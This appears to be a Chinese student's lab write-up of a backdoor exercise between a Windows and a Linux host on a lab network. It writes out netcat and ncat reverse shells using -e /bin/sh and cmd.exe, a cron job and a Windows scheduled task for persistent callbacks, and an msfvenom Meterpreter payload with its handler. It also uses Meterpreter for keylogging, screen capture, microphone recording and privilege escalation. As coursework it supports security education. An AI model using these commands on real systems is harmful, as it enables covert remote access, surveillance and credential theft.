1.例举你能想到的一个后门进入到你系统中的可能方式?linux
2.例举你知道的后门如何启动起来(win及linux)的方式?git
3.Meterpreter有哪些给你映像深入的功能?web
4.如何发现本身有系统有没有被安装后门?shell
1.在Win下,先使用ipconfig
指令查看本机IP:172.30.6.22
vim
2.使用ncat.exe
程序监听4308
端口:ncat -l -p 4308
windows
3.Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh
命令去链接Win的4308端口。
安全
4.链接成功后就能够在Win的cmd
窗口中输入Linux的命令,此时已经获取了Linux的shell。
网络
1.在Linux下使用ifconfig
命令查看本地主机IP:172.30.5.236
tcp
2.在Linux使用ncat.exe
程序监听4308
端口:nc -l -p 4308
编辑器
3.Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口
命令去链接Linux的4308
端口:ncat.exe -e cmd.exe 172.30.5.236 4308
4.链接成功后就能够在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。
两个步骤相似,只是执行命令的主机相反。
netcat根据课上所学简单来说,就是利用tcp、udp链接进行基本的数据收发,在两台主机之间传输字符文件之类的,因此咱们在这里尝试用它在win和linux之间作一个后门。
1.Win使用ncat.exe -l 4308
命令监听本机的4308
端口。
2.Linux使用nc 172.30.5.22 4308
命令去链接Win的4308
端口,其中的ip地址应为linux的ip地址。
3.链接成功后便可传输数据,在linux终端输入的字符能够出如今win终端,而在win终端输入的字符也会出如今linux终端。如上图
4.也能够利用以下命令将文件里的内容做为输入,写入到另外一台主机的文件里
nc -l 1234 > filename.out
nc host.example.com 1234 < filename.in
1.ncat.exe -l -p 4308
win运行ncat.exe监听4308
端口。(忘记截图)
2.crontab -e
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。由于是第一次编辑,因此会提示选择编辑器,咱们选择3
,利用最基本的vim编辑器进行编辑。
(再次忘记截图,由于当时卡在了怎么编辑文件,看到了某一个学姐的博客以后才知道,仍是基础知识掌握得不牢固,很不牢固,可是会加油的)
按a
进入编辑状态,在文件最后一行添加18 * * * * /bin/netcat 172.30.6.22 4308 -e /bin/sh
表示在每一个小时的第18分钟反向链接win的4308
端口。
添加完后:wq
存盘退出,配置即生效。
3.当时间到了18分时,win已经得到了linux的shell,能够输入ls等指令,而在18分之前,终端里是不会有任何反应的。
1.在Win系统下,打开控制面板->系统和安全->管理工具->任务计划程序,建立任务,填写任务名称20154308
新建一个触发器,设置以下
2.下载socat软件,下载地址[https://gitee.com/wildlinux/NetSec/attach_files](老师的讲义里给的附件)
在操做->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4308 exec:cmd.exe,pty,stderr
3.建立完成以后,按Windows+L快捷键锁定计算机,再次打开时,能够发现以前建立的任务已经开始运行:
4.此时,在linux终端输入指令socat - tcp:172.30.6.22:4308
,这里的第一个参数-表明标准的输入输出,第二个流链接到Wind主机的4308端口,此时能够发现已经成功得到了一个win shell:
1.生成后门程序msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.5.236 LPORT=4308 -f exe > 20154308_backdoor.exe
2.将生成的后门程序传送到Win主机上ncat.exe -lv 4308 > 20154308_backdoor.exe
3.在linux上使用msfconsole指令进入msf控制台,进行一系列以下设置
msfconsole
进入msf(图案好像会不同,可是不太清楚是啥)
use exploit/multi/handler
进入handler模式
set payload windows/meterpreter/reverse_tcp
设置payload
set LHOST 172.30.5.236
设置LHOST
set LPORT 4308
设置LPORT
show options
查看当前信息状态
exploit
msf开始监听
4.20154308_backdoor.exe
在win上打开后门程序
5.而后能够发现linux已经得到了Win shell
6.接下来就能够利用msf作一些有趣的事情
record_mic
录音
webcam_snap
拍照(惋惜没有成功)
screenshot
截屏
使用keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录:
先使用getuid
指令查看当前用户,使用getsystem
指令进行提权,如图所示,提权成功
3.1 后门程序传送到win后,win没法打开后门程序
20154308_backdoor.exe
被查杀了3.2 没法使用摄像头进行偷拍,非常难过,检查过设备管理器,确实是没有摄像头设备